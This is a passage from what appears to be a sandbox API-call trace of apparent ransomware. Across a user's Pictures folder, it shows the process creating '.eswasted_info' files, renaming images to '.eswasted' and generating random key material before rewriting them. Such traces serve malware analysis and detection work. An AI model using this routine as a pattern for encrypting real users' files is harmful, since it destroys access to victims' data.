lpString1=0x6f5d46, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\87YzhV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\87yzhv.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\87YzhV.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\87yzhv.png.eswasted")) returned 1 [0079.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\87YzhV.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\87yzhv.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.762] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.765] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.766] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.766] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.766] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.783] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.783] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.793] SetEndOfFile (hFile=0x130) returned 1 [0079.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.814] CloseHandle (hObject=0x130) returned 1 [0079.815] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.815] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.816] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.816] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.816] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\b46ADN.gif") returned 67 [0079.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x6f5cc0 [0079.816] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0079.816] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.817] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0079.817] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\b46ADN.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\b46adn.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.818] WriteFile (in: hFile=0x130, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.818] SetEndOfFile (hFile=0x130) returned 1 [0079.819] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.819] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.819] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\b46ADN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\b46adn.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\b46ADN.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\b46adn.gif.eswasted")) returned 1 [0079.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\b46ADN.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\b46adn.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.820] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.821] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.822] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.822] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.822] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.823] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.823] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.831] SetEndOfFile (hFile=0x130) returned 1 [0079.833] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.833] CloseHandle (hObject=0x130) returned 1 [0079.835] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.835] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.836] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.836] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\khOk7LxQS Cfk8.png") returned 75 [0079.836] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a0) returned 0x6f5cc0 [0079.836] lstrcpyW (in: lpString1=0x6f5d56, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.836] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0079.836] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.837] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0079.837] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\khOk7LxQS Cfk8.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\khok7lxqs cfk8.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.838] WriteFile (in: hFile=0x130, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.839] SetEndOfFile (hFile=0x130) returned 1 [0079.839] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.839] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0079.839] lstrcpyW (in: lpString1=0x6f5d56, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\khOk7LxQS Cfk8.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\khok7lxqs cfk8.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\khOk7LxQS Cfk8.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\khok7lxqs cfk8.png.eswasted")) returned 1 [0079.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\khOk7LxQS Cfk8.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\khok7lxqs cfk8.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.840] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.842] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.842] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.843] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.843] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.844] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.844] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.900] SetEndOfFile (hFile=0x130) returned 1 [0079.903] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0079.903] CloseHandle (hObject=0x130) returned 1 [0079.905] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.905] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.906] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.906] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.907] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\qoRU1cRUYqUsCfwKD.bmp") returned 78 [0079.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x6f5cc0 [0079.907] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.907] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0079.907] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.908] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0079.908] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\qoRU1cRUYqUsCfwKD.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\qoru1cruyquscfwkd.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.909] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.910] SetEndOfFile (hFile=0x130) returned 1 [0079.910] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.910] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0079.910] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\qoRU1cRUYqUsCfwKD.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\qoru1cruyquscfwkd.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\qoRU1cRUYqUsCfwKD.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\qoru1cruyquscfwkd.bmp.eswasted")) returned 1 [0079.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\qoRU1cRUYqUsCfwKD.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\qoru1cruyquscfwkd.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.911] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.913] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.914] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.914] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.915] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.915] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.915] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.926] SetEndOfFile (hFile=0x130) returned 1 [0079.929] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0079.929] CloseHandle (hObject=0x130) returned 1 [0079.931] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.931] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.932] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.932] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\uv1aw3.gif") returned 67 [0079.932] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x6f5cc0 [0079.932] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.932] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0079.932] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.933] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0079.933] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\uv1aw3.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\uv1aw3.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.934] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.935] SetEndOfFile (hFile=0x130) returned 1 [0079.936] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0079.936] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\uv1aw3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\uv1aw3.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\uv1aw3.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\uv1aw3.gif.eswasted")) returned 1 [0079.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\uv1aw3.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\uv1aw3.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.959] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.960] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.961] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.961] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.961] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.962] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.962] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.973] SetEndOfFile (hFile=0x130) returned 1 [0079.976] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0079.976] CloseHandle (hObject=0x130) returned 1 [0079.978] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.978] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0079.979] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0079.979] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.979] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\vF_thl5aiyFrjJA.bmp") returned 76 [0079.979] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x6f5cc0 [0079.979] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.979] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0079.979] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0079.980] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0079.980] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\vF_thl5aiyFrjJA.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\vf_thl5aiyfrjja.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.981] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.982] SetEndOfFile (hFile=0x130) returned 1 [0079.982] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.982] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0079.982] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\vF_thl5aiyFrjJA.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\vf_thl5aiyfrjja.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\vF_thl5aiyFrjJA.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\vf_thl5aiyfrjja.bmp.eswasted")) returned 1 [0079.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\vF_thl5aiyFrjJA.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\vf_thl5aiyfrjja.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.984] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.987] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0079.988] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.988] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.988] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0079.989] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0079.989] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.033] SetEndOfFile (hFile=0x130) returned 1 [0080.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.036] CloseHandle (hObject=0x130) returned 1 [0080.038] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.038] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.040] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.040] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.040] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KTDqRNhC.gif") returned 55 [0080.040] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x278) returned 0x6f5cc0 [0080.040] lstrcpyW (in: lpString1=0x6f5d2e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.040] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0080.040] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.041] CryptGenRandom (in: 